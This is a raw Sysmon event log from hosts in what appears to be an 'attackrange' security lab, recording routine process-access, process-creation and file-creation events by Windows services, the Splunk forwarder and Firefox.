08:10:24.279{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810809Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:10:24.279{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810808Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:10:24.279{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810807Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:10:24.279{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810806Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:10:24.279{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810805Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:10:24.279{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810804Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:10:24.279{0C1E0330-048F-60E8-0500-00000000D001}412528C:\Windows\system32\csrss.exe{0C1E0330-F8F0-60EB-F179-00000000D001}172C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000810803Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:10:24.279{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F8F0-60EB-F179-00000000D001}172C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000810802Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:10:24.264{0C1E0330-F8F0-60EB-F179-00000000D001}172C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000810845Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:10:25.654{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F8F1-60EB-F379-00000000D001}2464C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810844Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:10:25.654{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810843Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:10:25.654{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810842Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:10:25.654{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810841Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:10:25.654{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810840Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:10:25.654{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810839Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:10:25.654{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810838Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:10:25.654{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810837Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:10:25.654{0C1E0330-048F-60E8-0500-00000000D001}412528C:\Windows\system32\csrss.exe{0C1E0330-F8F1-60EB-F379-00000000D001}2464C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000810836Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:10:25.654{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810835Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:10:25.654{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810834Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:10:25.654{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F8F1-60EB-F379-00000000D001}2464C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000810833Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:10:25.639{0C1E0330-F8F1-60EB-F379-00000000D001}2464C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000810832Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:10:25.607{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=09B97D8F040BF3C45149727E6A99DAFE,SHA256=FFB0DA4F1BF2F4EB4F09E7B954DA073DE90929827F8C3BC11BD0A14215064800,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055520Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:25.239{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.sqlite-shmMD5=40228A74B32178CA26832C2171767ABE,SHA256=781DEE5D30D62E5DA66ED8D13A6CC32810C0C6EDA578794D8E9660A53903DADF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055519Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:25.086{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DA962786A8D096F56034929E78866B6A,SHA256=640AEC52CBABEFF356394A699A5A823CC9456712D8697D05E9D3FD055DDB85DF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810831Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:10:25.279{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=FF384C1F253C934175EDE2457607C89E,SHA256=99FF886ACA90F77B3D48C00E1FA70724D91D8A14CC41EC11ABF716C8AA53ACD3,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000810874Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:10:26.935{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F8F2-60EB-F579-00000000D001}3536C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810873Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:10:26.935{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000810872Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 